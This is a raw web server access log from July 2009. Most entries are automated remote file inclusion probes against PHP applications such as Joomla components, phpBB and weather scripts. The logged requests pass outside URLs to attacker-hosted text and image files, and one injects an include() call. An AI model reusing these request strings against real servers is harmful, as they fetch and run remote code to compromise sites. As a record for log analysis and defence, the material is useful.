72.82.228.83 - - [06/Jul/2009:05:48:54 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.82.228.83 - - [06/Jul/2009:05:49:00 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:05:49:08 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:05:49:08 -0400] "GET /logs/access_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:05:49:08 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.65.41.165 - - [06/Jul/2009:05:49:09 -0400] "GET /logs/access_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.65.41.165 - - [06/Jul/2009:05:49:09 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
69.65.41.165 - - [06/Jul/2009:05:49:09 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:05:49:09 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:05:49:09 -0400] "GET /logs/access_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:05:49:09 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:05:49:16 -0400] "GET /logs/access_log.Q109061200////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:05:49:16 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
217.70.32.2 - - [06/Jul/2009:05:49:16 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:49:22 -0400] "GET /logs/access_log.Q109051400/s_loadenv.inc.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jul/2009:05:49:27 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jul/2009:05:49:27 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jul/2009:05:49:27 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jul/2009:05:49:35 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
125.245.146.253 - - [06/Jul/2009:05:49:37 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:49:37 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:49:37 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:05:50:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [06/Jul/2009:05:50:36 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jul/2009:05:50:36 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jul/2009:05:50:36 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
216.117.128.143 - - [06/Jul/2009:05:50:45 -0400] "GET /logs/access_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jul/2009:05:50:47 -0400] "GET /logs/error_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aciel.biz.ly/dataquw/CHID.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
69.65.41.165 - - [06/Jul/2009:05:50:49 -0400] "GET /logs/access_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:05:50:53 -0400] "GET /logs/access_log.Q108040600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
195.34.78.110 - - [06/Jul/2009:05:51:00 -0400] "GET /logs/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:00 -0400] "GET /index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:00 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:17 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:40 -0400] "GET /index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:40 -0400] "GET /logs/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:40 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:52 -0400] "GET /index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:52 -0400] "GET /logs/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:52 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:52 -0400] "GET /index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:52 -0400] "GET /logs/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:52 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:51:56 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:52:02 -0400] "GET /index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:52:02 -0400] "GET /logs/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:52:02 -0400] "GET /logs/access_log.Q109060400%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:52:06 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:52:07 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:05:52:16 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.41.165 - - [06/Jul/2009:05:52:21 -0400] "GET /logs/error_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com//skin/connect/basic/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:05:52:23 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:05:53:31 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.106.179.130 - - [06/Jul/2009:05:53:36 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
216.117.128.143 - - [06/Jul/2009:05:53:49 -0400] "GET /logs/error_log.Q109061200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:05:54:02 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.230.156.161 - - [06/Jul/2009:05:54:02 -0400] "GET /logs/access_log.Q109052600//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.230.156.161 - - [06/Jul/2009:05:54:02 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.230.156.161 - - [06/Jul/2009:05:54:02 -0400] "GET /logs/access_log.Q109053100//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
211.230.156.161 - - [06/Jul/2009:05:55:35 -0400] "GET /logs/access_log.Q109052600//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.230.156.161 - - [06/Jul/2009:05:55:35 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.230.156.161 - - [06/Jul/2009:05:55:35 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
209.59.12.99 - - [06/Jul/2009:05:55:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [06/Jul/2009:05:55:36 -0400] "GET /logs/access_log.Q109053100//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.230.156.161 - - [06/Jul/2009:05:55:37 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.230.156.161 - - [06/Jul/2009:05:55:38 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.230.156.161 - - [06/Jul/2009:05:55:38 -0400] "GET /logs/access_log.Q109052600//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.230.156.161 - - [06/Jul/2009:05:55:38 -0400] "GET /logs/access_log.Q109053100//include//functions.inc.php?REX[INCLUDE_PATH]=http://game24x7.com/cfg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
88.198.22.248 - - [06/Jul/2009:05:55:40 -0400] "GET /logs/access_log.Q109060100/index.php?page=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
66.249.68.247 - - [06/Jul/2009:05:57:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3130094C723354008941018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [06/Jul/2009:06:00:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.198.22.248 - - [06/Jul/2009:06:00:44 -0400] "GET /logs/access_log.Q109060100/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
195.34.78.110 - - [06/Jul/2009:06:01:20 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:27 -0400] "GET /logs/access_log.Q109061900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:32 -0400] "GET /components/com_sef/sef.class.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:32 -0400] "GET /logs/components/com_sef/sef.class.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:32 -0400] "GET /logs/access_log.Q109052900/components/com_sef/sef.class.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:06:01:38 -0400] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:06:01:38 -0400] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:06:01:38 -0400] "GET /logs/access_log.Q109051500//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:46 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:06:01:46 -0400] "GET /logs/access_log.Q109051700//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:50 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:52 -0400] "GET /logs/access_log.Q109061900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:01:53 -0400] "GET /logs/access_log.Q109061900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:02:24 -0400] "GET /logs/access_log.Q109060900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:06:02:31 -0400] "GET /logs/access_log.Q109061900/index.php?redir=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:06:03:18 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.125.38.117 - - [06/Jul/2009:06:03:41 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:03:43 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:03:43 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:03:55 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:06:04:07 -0400] "GET /logs/access_log.Q109051500%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:06:04:12 -0400] "GET /logs/access_log.Q109051700%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:06:05:14 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:06:05:14 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:06:05:14 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:06:05:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.125.38.117 - - [06/Jul/2009:06:05:37 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:05:38 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:05:38 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.245.146.253 - - [06/Jul/2009:06:06:26 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:06:06:32 -0400] "GET /phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
217.125.38.117 - - [06/Jul/2009:06:06:35 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:06:06:41 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.68.70 - - [06/Jul/2009:06:07:00 -0400] "GET /images/items/0032304_thumb.jpg HTTP/1.1" 200 2530 "-" "Googlebot-Image/1.0"
61.78.62.84 - - [06/Jul/2009:06:07:02 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:06:07:02 -0400] "GET /logs/access_log.Q109061600//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:06:07:02 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.158.98.196 - - [06/Jul/2009:06:07:02 -0400] "GET /phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 209 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
61.78.62.84 - - [06/Jul/2009:06:07:02 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
84.51.241.6 - - [06/Jul/2009:06:07:20 -0400] "GET /logs/access_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:06:07:22 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.51.241.6 - - [06/Jul/2009:06:07:30 -0400] "GET /logs/access_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://www.yaco-online.com.br/mambots/perkosa.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
218.158.98.196 - - [06/Jul/2009:06:07:32 -0400] "GET /phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
89.171.190.110 - - [06/Jul/2009:06:07:38 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.171.190.110 - - [06/Jul/2009:06:07:38 -0400] "GET /phphtml.php?htmlclass_path=http://www.cerao-aceao.org//cerao/images/idste.txt? HTTP/1.1" 404 209 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.249.68.247 - - [06/Jul/2009:06:07:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3130094C71E324008941018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.19.130.218 - - [06/Jul/2009:06:07:53 -0400] "GET /logs/access_log.Q109062000/components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:06:07:54 -0400] "GET /components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
67.19.130.218 - - [06/Jul/2009:06:07:54 -0400] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.810"
98.116.62.213 - - [06/Jul/2009:06:08:05 -0400] "GET /logs//?view=page&pagename=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
98.116.62.213 - - [06/Jul/2009:06:08:08 -0400] "GET /logs/access_log.Q109060200//?view=page&pagename=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
98.116.62.213 - - [06/Jul/2009:06:08:08 -0400] "GET //?view=page&pagename=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:06:08:15 -0400] "GET /logs/access_log.Q109052400/components/com_simpleboard/image_upload.php?sbp=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.810"
